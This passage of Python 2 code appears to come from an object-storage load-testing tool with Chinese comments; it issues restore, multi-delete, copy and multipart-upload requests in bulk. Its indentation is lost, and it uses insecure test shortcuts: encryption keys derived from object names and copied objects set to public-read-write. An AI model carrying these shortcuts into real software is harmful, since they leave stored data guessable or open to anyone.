rest.key = CONFIG['ObjectNameFixed']
range_arr = range(0, CONFIG['BucketsPerUser'])
# 错开每个并发起始选桶,避免单桶性能瓶颈。
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
# rest.bucket = '%s.%d' % (CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def restore_object(process_id, user, conn, result_queue):
request_type = 'RestoreObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
# 如果传入OBJECTS,则直接处理OBJECTS。
global OBJECTS
if OBJECTS:
handle_from_objects(request_type, rest, process_id, user, conn, result_queue)
return
# 如果data下有上传记录的对象名和版本,从该文件读。
obj_v_file = 'data/objv-%d.dat' % process_id
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
handle_from_obj_v(request_type, obj_v_file, rest, process_id, user, conn, result_queue)
return
elif not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
rest.queryArgs['restore'] = None
range_arr = range(0, CONFIG['BucketsPerUser'])
# 错开每个并发起始选桶,避免单桶性能瓶颈。
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,
process_id % CONFIG[
'BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
rest.sendContent = '<RestoreRequest xmlns="http://s3.amazonaws.com/doc/2006-3-01"><Days>%s</Days><GlacierJobParameters><Tier>%s</Tier></GlacierJobParameters></RestoreRequest>' % (
CONFIG['RestoreDays'], CONFIG['RestoreTier'])
logging.debug('send content [%s] ' % rest.sendContent)
rest.headers['Content-MD5'] = base64.b64encode(hashlib.md5(rest.sendContent).digest())
j += 1
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def delete_multi_objects(process_id, user, conn, result_queue):
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['ObjectsPerBucketPerThread'] <= 0:
logging.warn('ObjectsPerBucketPerThread <= 0, exit..')
return
request_type = 'DeleteMultiObjects'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['delete'] = None
i = 0
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
delete_times_per_bucket = math.ceil(
CONFIG['ObjectsPerBucketPerThread'] * 1.0 / CONFIG['DeleteObjectsPerRequest'])
logging.debug('ObjectsPerBucketPerThread: %d, DeleteObjectsPerRequest: %d, delete_times_per_bucket:%d' % (
CONFIG['ObjectsPerBucketPerThread'], CONFIG['DeleteObjectsPerRequest'], delete_times_per_bucket))
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
rest.sendContent = '<Delete>'
k = 0
while k < CONFIG['DeleteObjectsPerRequest']:
if j >= CONFIG['ObjectsPerBucketPerThread']:
break
rest.sendContent += '<Object><Key>%s</Key></Object>' % CONFIG['ObjectNamePartten'].replace('processID', str( process_id)).replace(
'Index', str(j)).replace('ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
k += 1
rest.sendContent += '</Delete>'
logging.debug('send content [%s] ' % rest.sendContent)
rest.headers['Content-MD5'] = base64.b64encode(hashlib.md5(rest.sendContent).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftupload_dynamic_big_object(process_id, user, conn, result_queue):
request_type = 'swiftUploadDynamicBigObject'
sendContent = ''
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk, send_content = sendContent)
rest.headers['X-auth-token'] = user.sk
fixed_size = False
rest.headers['content-type'] = 'application/octet-stream'
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNameFixed']
# 如果打开CalHashMD5开关,在对象上传时写入一个自定义元数据,用于标记为本工具put上传的对象。
if CONFIG['CalHashMD5']:
rest.headers['x-amz-meta-md5written'] = 'yes'
# 错开每个并发起始选桶,避免单桶性能瓶颈。
range_arr = range(0, CONFIG['BucketsPerUser'])
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,process_id % CONFIG['BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
if CONFIG['ObjectLexical']:
rest.prefixkey = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index', str(
j)).replace('ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
else:
rest.prefixkey = Util.random_string_create(random.randint(300, 1024))
j += 1
parts_for_dynamic_big = CONFIG['PartsForEachUploadID']
for k in range(1,parts_for_dynamic_big+1):
if not fixed_size:
# change size every request for the same obj.
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
rest.key = '%s-%d'%(rest.prefixkey,k)
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
rest.key = rest.prefixkey
rest.headers['x-object-manifest'] = ('%s/%s'%(rest.bucket, rest.key))
partContentLength = rest.contentLength
rest.contentLength=0
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
rest.headers.pop('x-object-manifest')
rest.contentLength = partContentLength
def swiftdelete_dynamic_big_object(process_id, user, conn, result_queue):
request_type = 'swiftDeleteDynamicBigObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak = user.ak, sk = user.sk)
rest.headers['X-auth-token'] = user.sk
fixed_size = False
rest.headers['content-type'] = 'application/octet-stream'
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNameFixed']
# 如果打开CalHashMD5开关,在对象上传时写入一个自定义元数据,用于标记为本工具put上传的对象。
if CONFIG['CalHashMD5']:
rest.headers['x-amz-meta-md5written'] = 'yes'
# 错开每个并发起始选桶,避免单桶性能瓶颈。
range_arr = range(0, CONFIG['BucketsPerUser'])
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,process_id % CONFIG['BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
if CONFIG['ObjectLexical']:
rest.prefixkey = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index', str(
j)).replace('ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
else:
rest.prefixkey = Util.random_string_create(random.randint(300, 1024))
j += 1
parts_for_dynamic_big = CONFIG['PartsForEachUploadID']
for k in range(1,parts_for_dynamic_big+1):
rest.key = '%s-%d'%(rest.prefixkey,k)
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
rest.key = rest.prefixkey
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
def copy_object(process_id, user, conn, result_queue):
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
request_type = 'CopyObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['x-amz-acl'] = 'public-read-write'
rest.headers['x-amz-metadata-directive'] = 'COPY'
if CONFIG['copySrcObjFixed']:
rest.headers['x-amz-copy-source'] = '/' + CONFIG['copySrcObjFixed']
if CONFIG['copyDstObjFiexed']:
rest.bucket = CONFIG['copyDstObjFiexed'].split('/')[0]
rest.key = CONFIG['copyDstObjFiexed'].split('/')[1]
elif CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
if CONFIG['copySrcSrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-copy-source-server-side-encryption-customer-algorithm'] = 'AES256'
if CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aws:kms':
rest.headers['x-amz-server-side-encryption'] = 'aws:kms'
if CONFIG['SrvSideEncryptAWSKMSKeyId']:
rest.headers['x-amz-server-side-encryption-aws-kms-key-id'] = CONFIG['SrvSideEncryptAWSKMSKeyId']
if CONFIG['SrvSideEncryptContext']:
rest.headers['x-amz-server-side-encryption-context'] = CONFIG['SrvSideEncryptContext']
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aes256':
rest.headers['x-amz-server-side-encryption'] = 'AES256'
i = 0
while i < CONFIG['BucketsPerUser']:
# 如果未配置目的对象和固定桶,设置目的桶为源对象所在的桶
if not CONFIG['copyDstObjFiexed'] and not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['copyDstObjFiexed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'] + '.copy')
if not CONFIG['copySrcObjFixed']:
rest.headers['x-amz-copy-source'] = '/%s/%s' % (
rest.bucket, CONFIG['ObjectNamePartten'].replace('processID', str(
process_id)).replace('Index', str(j)).replace('ObjectNamePrefix', CONFIG['ObjectNamePrefix']))
j += 1
if CONFIG['copySrcSrvSideEncryptType'].lower() == 'sse-c':
src_en_key = rest.headers['x-amz-copy-source'].split('/')[2][-32:].zfill(32)
rest.headers['x-amz-copy-source-server-side-encryption-customer-key'] = base64.b64encode(src_en_key)
rest.headers['x-amz-copy-source-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(src_en_key).digest())
logging.debug('src encrpt key: %s, src encrypt key md5: %s' % (
src_en_key, rest.headers['x-amz-copy-source-server-side-encryption-customer-key-MD5']))
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
# 同拷贝对象,若拷贝段操作先返回200 OK,并不代表拷贝成功。如果返回了200,但没有获取到ETag,将response修改为500错误。
if resp.status.startswith('200 ') and not resp.return_data:
logging.info('response 200 OK without ETag, set status code 500 InternalError')
resp.status = '500 InternalError'
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes,
'copySrc:' + rest.headers['x-amz-copy-source'], resp.request_id, resp.status))
def init_multi_upload(process_id, user, conn, result_queue):
if not CONFIG['ObjectLexical']:
logging.warn('Object name is not lexical, exit..')
return
if CONFIG['ObjectsPerBucketPerThread'] <= 0 or CONFIG['BucketsPerUser'] <= 0:
logging.warn('ObjectsPerBucketPerThread or BucketsPerUser <= 0, exit..')
return
request_type = 'InitMultiUpload'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.queryArgs['uploads'] = None
if CONFIG['PutWithACL']:
rest.headers['x-amz-acl'] = CONFIG['PutWithACL']
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNameFixed']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aws:kms':
rest.headers['x-amz-server-side-encryption'] = 'aws:kms'
if CONFIG['SrvSideEncryptAWSKMSKeyId']:
rest.headers['x-amz-server-side-encryption-aws-kms-key-id'] = CONFIG['SrvSideEncryptAWSKMSKeyId']
if CONFIG['SrvSideEncryptContext']:
rest.headers['x-amz-server-side-encryption-context'] = CONFIG['SrvSideEncryptContext']
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG['SrvSideEncryptAlgorithm'].lower() == 'aes256':
rest.headers['x-amz-server-side-encryption'] = 'AES256'
upload_ids = ''
i = 0
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
# 如果请求成功,记录return_data(UploadId)到本地文件
if resp.status.startswith('200 '):
logging.debug('rest.key:%s, rest.returndata:%s' % (rest.key, resp.return_data))
upload_ids += '%s\t%s\t%s\t%s\n' % (user.username, rest.bucket, rest.key, resp.return_data)
if upload_ids == '':
return None
# 退出前,写统计结果到本地文件
uploadid_writer = None
uploadid_file = 'data/upload_id-%d.dat' % process_id
try:
uploadid_writer = open(uploadid_file, 'w')
uploadid_writer.write(upload_ids)
except Exception, data:
logging.error('process [%d] write upload_ids error %s' % (process_id, data))
finally:
if uploadid_writer:
try:
uploadid_writer.close()
except IOError:
pass
def upload_part(process_id, user, conn, result_queue):
# 从本地加载本进程需要做的upload_ids。考虑到单upload_id多并发上传段场景,需要加载其它进程初始化的upload_ids。
# 如5个用户,每用户2个并发,则每个upload_id可以最大2个并发上传段。
# upload_id-0(usr0,p0) upload_id-1(usr0,p1) upload_id-2(usr1,p2) upload_id-3(usr1,p3) upload_id-4(usr2,p4)
# upload_id-5(usr2,p5) upload_id-6(usr3,p6) upload_id-7(usr3,p7) upload_id-8(usr4,p8) upload_id-9(usr4,p9)
# p0,p1需要顺序加载usr0,p0和usr0,p1
upload_ids = []
if not CONFIG['ConcurrentUpParts']:
id_files = [process_id]
else:
id_files = range(process_id / CONFIG['ThreadsPerUser'] * CONFIG['ThreadsPerUser'],
(process_id / CONFIG['ThreadsPerUser'] + 1) * CONFIG['ThreadsPerUser'])
for i in id_files:
upload_id_file = 'data/upload_id-%d.dat' % i
try:
with open(upload_id_file, 'r') as fd:
for line in fd:
if line.strip() == '':
continue
# 如果非本并发的用户初始化的upload_id,跳过。
if not line.startswith(user.username + '\t'):
continue
if len(line.split('\t')) != 4:
logging.warn('upload_ids record error [%s]' % line)
continue
# 记录upload_id的原并发号i
upload_ids.append((str(i) + '.' + line.strip()).split('\t'))
fd.close()
logging.info('process %d load upload_ids file %s end' % (process_id, upload_id_file))
except Exception, data:
logging.error("load %s for process %d error, [%r], exit" % (upload_id_file, process_id, data))
continue
if not upload_ids:
logging.info("load no upload_id for process %d, from file upload_id-%r exit" % (process_id, idFiles))
return
else:
logging.info("total load %d upload_ids" % len(upload_ids))
fixed_size = False
request_type = 'UploadPart'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['content-type'] = 'application/octet-stream'
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
for upload_id in upload_ids:
rest.bucket = upload_id[1]
rest.key = upload_id[2]
rest.queryArgs['uploadId'] = upload_id[3]
# partsRecord += '%d.%s\t%s\t%s\t%s\t' % (tup[0],user.username,tup[1],tup[2],tup[3])
parts_record = ''
# 如果开启了并发上传段,本并发只处理部分段。
if not CONFIG['ConcurrentUpParts']:
part_ids = range(1, CONFIG['PartsForEachUploadID'] + 1)
else:
part_ids = range(process_id % CONFIG['ThreadsPerUser'] + 1, CONFIG['PartsForEachUploadID'] + 1,
CONFIG['ThreadsPerUser'])
logging.debug('process %d handle parts: %r' % (process_id, part_ids))
if not part_ids:
logging.info(
'process %d has no parts to do for upload_id %s, break' % (process_id, rest.queryArgs['uploadId']))
continue
for i in part_ids:
rest.queryArgs['partNumber'] = str(i)
if not fixed_size:
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
if resp.status.startswith('200 '):
parts_record += '%d:%s,' % (i, resp.return_data)
upload_id.append(parts_record)
# 记录各段信息到本地文件 ,parts_etag-x.dat,格式:桶名\t对象名\tupload_id\tpartNo:Etag,partNo:Etag,...
part_record_file = 'data/parts_etag-%d.dat' % process_id
parts_record_writer = None
parts_records = ''
for upload_id in upload_ids:
parts_records += '\t'.join(upload_id) + '\n'
try:
parts_record_writer = open(part_record_file, 'w')
parts_record_writer.write(parts_records)
except Exception, data:
logging.error('process [%d] write file %s error, %s' % (process_id, part_record_file, data))
finally:
if parts_record_writer:
try:
parts_record_writer.close()
except IOError:
pass
def swiftupload_static_big_object(process_id, user, conn, result_queue):
# 从本地加载本进程需要做的upload_ids。考虑到单upload_id多并发上传段场景,需要加载其它进程初始化的upload_ids。
# 如5个用户,每用户2个并发,则每个upload_id可以最大2个并发上传段。
# upload_id-0(usr0,p0) upload_id-1(usr0,p1) upload_id-2(usr1,p2) upload_id-3(usr1,p3) upload_id-4(usr2,p4)
# upload_id-5(usr2,p5) upload_id-6(usr3,p6) upload_id-7(usr3,p7) upload_id-8(usr4,p8) upload_id-9(usr4,p9)
# p0,p1需要顺序加载usr0,p0和usr0,p1
fixed_size = False
request_type = 'swiftUploadStaticBigObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['content-type'] = 'application/octet-stream'
rest.headers['X-auth-token'] = user.sk
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNameFixed']
range_arr = range(0, CONFIG['BucketsPerUser'])
# 错开每个并发起始选桶,避免单桶性能瓶颈。
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,process_id % CONFIG['BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
fixed_size = False
parts_for_static_big = CONFIG['PartsForEachUploadID']
k=1
manifest=''
rest.queryArgs={}
rest.sendContent=''
for k in range(1,parts_for_static_big+1):
if not fixed_size:
# change size every request for the same obj.
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
rest.key = '%s-%d'%(rest.prefixkey,k)
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
# 如果请求成功,记录return_data(UploadId)到本地文件
onemanifest =''
if resp.status.startswith('20'):
onemanifest = '"path":"'+rest.bucket+'/'+rest.key+'",'
onemanifest += '"etag":"'+resp.return_data+'",'
onemanifest += '"size_bytes":'+str(rest.contentLength)
manifest +='{'+onemanifest+'},'
manifest = manifest[:-1]
manifest = '['+manifest+']'
rest.queryArgs['multipart-manifest'] ="PUT"
rest.key = rest.prefixkey
rest.sendContent=manifest
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftdelete_static_big_object(process_id, user, conn, result_queue):
request_type = 'swiftDeleteStaticBigObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['content-type'] = 'application/octet-stream'
rest.headers['X-auth-token'] = user.sk
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNameFixed']
range_arr = range(0, CONFIG['BucketsPerUser'])
# 错开每个并发起始选桶,避免单桶性能瓶颈。
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,process_id % CONFIG['BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
rest.queryArgs['multipart-manifest'] ="DELETE"
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def copy_part(process_id, user, conn, result_queue):
# 必须传入OBJECTS,否则无法拷贝。
global OBJECTS
if not OBJECTS:
logging.error("can not find source object, exit")
return
# 从本地加载本进程需要做的upload_ids。考虑到单upload_id多并发上传段场景,需要加载其它进程初始化的upload_ids。
# 如5个用户,每用户2个并发,则每个upload_id可以最大2个并发上传段。
# upload_id-0(usr0,p0) upload_id-1(usr0,p1) upload_id-2(usr1,p2) upload_id-3(usr1,p3) upload_id-4(usr2,p4)
# upload_id-5(usr2,p5) upload_id-6(usr3,p6) upload_id-7(usr3,p7) upload_id-8(usr4,p8) upload_id-9(usr4,p9)
# p0,p1需要顺序加载usr0,p0和usr0,p1
upload_ids = []
if not CONFIG['ConcurrentUpParts']:
id_files = [process_id]
else:
id_files = range(process_id / CONFIG['ThreadsPerUser'] * CONFIG['ThreadsPerUser'],
(process_id / CONFIG['ThreadsPerUser'] + 1) * CONFIG['ThreadsPerUser'])
for i in id_files:
upload_id_file = 'data/upload_id-%d.dat' % i
try:
with open(upload_id_file, 'r') as fd:
for line in fd:
if line.strip() == '':
continue
# 如果非本并发的用户初始化的upload_id,跳过。
if not line.startswith(user.username + '\t'):
continue
if len(line.split('\t')) != 4:
logging.warn('upload_ids record error [%s]' % line)
continue
# 记录upload_id的原并发号i
upload_ids.append((str(i) + '.' + line.strip()).split('\t'))
fd.close()
logging.info('process %d load upload_ids file %s end' % (process_id, upload_id_file))
except Exception, data:
logging.error("load %s for process %d error, [%r], exit" % (upload_id_file, process_id, data))
continue
if not upload_ids:
logging.info("load no upload_id for process %d, exit" % process_id)
return
fixed_size = False
request_type = 'CopyPart'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
if CONFIG['copySrcSrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-copy-source-server-side-encryption-customer-algorithm'] = 'AES256'
parts_record = ''
for upload_id in upload_ids:
rest.bucket = upload_id[1]
rest.key = upload_id[2]
rest.queryArgs['uploadId'] = upload_id[3]
# 如果开启了并发上传段,本并发只处理部分段。
if not CONFIG['ConcurrentUpParts']:
part_ids = range(1, CONFIG['PartsForEachUploadID'] + 1)
else:
part_ids = range(process_id % CONFIG['ThreadsPerUser'] + 1, CONFIG['PartsForEachUploadID'] + 1,
CONFIG['ThreadsPerUser'])
logging.debug('process %d handle parts: %r' % (process_id, part_ids))
if not part_ids:
logging.info(
'process %d has no parts to do for upload_id %s, break' % (process_id, rest.queryArgs['uploadId']))
continue
for i in part_ids:
rest.queryArgs['partNumber'] = str(i)
if not fixed_size:
range_size, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
rest.headers['x-amz-copy-source'] = '/%s' % random.choice(OBJECTS)
range_start_index = random.randint(0, range_size * (CONFIG['PartsForEachUploadID'] - 1))
logging.debug('range_start_index:%d' % range_start_index)
rest.headers['x-amz-copy-source-range'] = 'bytes=%d-%d' % (
range_start_index, range_start_index + range_size - 1)
logging.debug('x-amz-copy-source-range:[%s]' % rest.headers['x-amz-copy-source-range'])
# 增加服务器端加密头域
if CONFIG['copySrcSrvSideEncryptType'].lower() == 'sse-c':
src_en_key = rest.headers['x-amz-copy-source'].split('/')[2][-32:].zfill(32)
rest.headers['x-amz-copy-source-server-side-encryption-customer-key'] = base64.b64encode(src_en_key)
rest.headers['x-amz-copy-source-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(src_en_key).digest())
logging.debug('src encrpt key: %s, src encrypt key md5: %s' % (
src_en_key, rest.headers['x-amz-copy-source-server-side-encryption-customer-key-MD5']))
